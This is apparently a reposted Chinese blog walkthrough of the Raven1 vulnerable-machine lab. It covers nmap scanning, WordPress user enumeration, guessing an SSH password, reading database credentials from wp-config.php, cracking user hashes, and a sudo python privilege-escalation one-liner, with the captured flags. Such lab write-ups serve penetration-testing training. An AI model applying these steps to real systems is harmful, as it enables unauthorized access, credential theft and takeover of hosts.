zoukankan      html  css  js  c++  java
  • jQuery火箭图标返回顶部代码

    Raven1渗透实战

    目录:

    1.wordpress爆破用户

    2.wp-config得到数据库账号密码

    3.ssh连接
    4.pythn提权(sudo python -c 'import pty;pty.spawn("/bin/bash")')

    主机发现与信息收集

    arp-scan –l
     
    主机发现
    nmap -sS -A -p- 192.168.8.127 –n
     
    nmap全端口扫

    Web渗透实战

    可以先修改一下hosts:
    192.168.8.127 raven.local
    进入web端,浓浓的wordpress风格
    http://192.168.8.127/wordpress/

    wordpress爆用户

    小tips:http://192.168.8.127/wordpress/?author=n (n=1,2,3,4……)
    http://192.168.8.127/wordpress/?author=1


    出现用户: MICHAEL (michael)

     
    wordpress

    找到后台 http://raven.local/wordpress/wp-login.php (michael登录失败)

    dir爆目录

    出现几个可疑的目录:
    http://192.168.8.127/vendor
    http://192.168.8.127/wordpress/
    继续爆这几个关键目录:

     
    dir

    看到pop3、phpmail和smtp就能想到应该和邮件有关的,应该是入口
     
    dir2

    在wordpress中罕见 http://192.168.8.127/service.html 并右键查看源代码
    Get到第一个flag:
    flag1{b9bbcb33e11b80be759c4e844862482d}
     
    flag1

    继续浏览爆出来的目录
    http://192.168.8.127/vendor/PATH 暴露了系统路径,也许之后会用到
    /var/www/html/vendor/
     
    path

    http://192.168.8.127/vendor/VERSION 暴露了版本信息 5.2.16
     
    version

    发现http://192.168.8.127/vendor/SECURITY.md 有提示
     
    提示

    从爆出来的这些目录来看,无疑是在提示从phpmailer入手
    这时想到了goldeneye中的pop3服务
    Nmap扫出来的端口中没有pop3和smtp服务
    只能从22端口ssh入手了

    ssh登录

    尝试登录ssh,用户名就用wordpress暴露的用户 michael,密码尝试用 michael

    ssh michael@192.168.8.127

    登录成功,果然提示有邮件mail,然而并没有邮件提示


     
    ssh

    直接全局搜flag

    find / -name "*flag*" 2>/dev/null
     
    find flag
    cat /var/www/flag2.txt
     
    flag2

    get第二个flag:
    flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

    常规提权

    netstat –a

    发现主机开启的端口和服务


     
    netstat -a

    在靶机的3306端口开启了mysql服务
    进入wordpress目录,查看conf配置文件,查看数据库密码

    vi wp-config.php
     
    wp-config

    root / R@v3nSecurity

    直接登录靶机的数据库
    mysql -u root –p
     
    mysql

    进入wordpress数据中,发现wp_posts表,应该是post数据

    select * from wp_posts;

    发现了flag3和flag4:

     
    flag3-4

    flag3{afc01ab56b50591e7dccf93122770cd2}
    flag4{715dea6c055b9fe3337544932f2941ce}
    查看wordpress数据库中的users表
     
    users

    michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
    steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

    md5解看看
     
    somd5

    steven 的密码为 pink84
    michael的解不出来
    拿去登录一下ssh试试
    ssh steven@192.168.8.127
     
    ssh
    sudo –l 

    显示出当前用户的权限,发现可以运行python,直接python提权

    sudo python -c 'import pty;pty.spawn("/bin/bash")'
     
    python root

    得到第四个flag:


     
  • 相关阅读:
    linux下mysql的安装
    linux下mysql设置主从
    linux下安装jdk8并且配置环境变量
    C#实现rabbitmq 延迟队列功能
    对angular.js的一点理解
    angular.js的路由和模板在asp.net mvc 中的使用
    通过Web Api 和 Angular.js 构建单页面的web 程序
    Orchard运用
    Orchard运用
    Orchard运用
  • 原文地址:https://www.cnblogs.com/kuaile1314/p/11769728.html
Copyright © 2011-2022 走看看